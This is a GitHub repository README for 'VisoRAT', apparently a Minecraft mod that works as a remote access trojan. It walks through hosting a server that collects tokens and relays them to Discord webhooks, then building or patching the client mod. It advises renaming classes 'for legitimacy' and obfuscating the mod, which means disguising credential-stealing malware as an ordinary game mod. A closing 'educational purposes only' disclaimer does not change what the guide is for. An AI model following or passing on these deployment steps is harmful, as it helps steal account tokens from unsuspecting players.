Skip to content
 
 

Repository files navigation

Setup Guide

Server Deployment

Option 1: VPS Hosting

  1. 📥 Download the repository
  2. 📁 Extract the server folder contents to your VPS
  3. ⚙️ Edit server/config.json to your preferences
  4. 🐍 Install Python/pip and requirements:
    pip install -r requirements.txt
  5. 🚀 Run the server:
    python server.py

Option 2: Render Hosting 🌐

  1. 🔒 Private Fork this repo (download & reupload privately)
  2. ⚙️ Edit server/config.json to your preferences
  3. 🔗 Create a Render account with your GitHub
  4. 🆕 Create a Web Service
  5. 📂 Select your forked repository
  6. ⚙️ Configure:
    • Branch: main
    • Root Directory: server
    • Runtime: Python 3
    • Build Command: pip install -r requirements.txt
    • Start Command: python server.py or python3 server.py
  7. ⏳ Wait for deployment

Mod/Client Setup

Option 1: Compile from Source

  1. 📥 Download the repository
  2. 🌐 Change Server IP in src/main/java/me/visoxd/VisoMod.java
  3. 🎭 Optional: Rename classes/folders for legitimacy
  4. 🔧 Compile with:

Option 2: Pre-built Release

  1. 📦 Download from Releases
  2. 🔧 Modify IP/URL using:
  3. 💾 Save and use the modified mod
  4. 🔒 Optional: Obfuscate the mod

Server Settings

The server configuration is stored in server/config.json. Below is a comprehensive table explaining all available settings:

Configuration Reference

Configuration Path Type Default Description
security.rate_limit_seconds Integer 600 Delay between requests an IP can send (in seconds)
security.min_token_length Integer 128 Minimum required length for tokens
security.check_duplicate_tokens Boolean true Blocks requests containing already seen tokens
endpoints.{endpoint}.webhooks Array - Webhooks registered to the specified endpoint
endpoints.{endpoint}.webhooks[].url String - Discord webhook URL (replace YOUR_DISCORD_WEBHOOK_URL_HERE)
endpoints.{endpoint}.webhooks[].name String - Webhook display name in Discord
endpoints.{endpoint}.webhooks[].footer String "VisoRAT" Footer text in the webhook embed
endpoints.{endpoint}.webhooks[].color Integer 7414964 Color of the webhook embed (decimal format)
endpoints.{endpoint}.webhooks[].avatar_url String - Direct link to image for webhook avatar

Note: Replace {endpoint} with your actual endpoint names (e.g., /receive, /auth)


Support

If this project works for you, please star ⭐ this repository to show your support. ❤️

🚨 Next update on: 20 Stars

💬 Discord: @visoxd


DISCLAIMER

🚨 WARNING: I am NOT responsible for any damage caused by this program. This software is for EDUCATIONAL PURPOSES ONLY. Use at your own risk and always ensure you have proper authorization before deploying any security-related tools.


📚 Credits to Schubilegend for the readme inspiration.

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages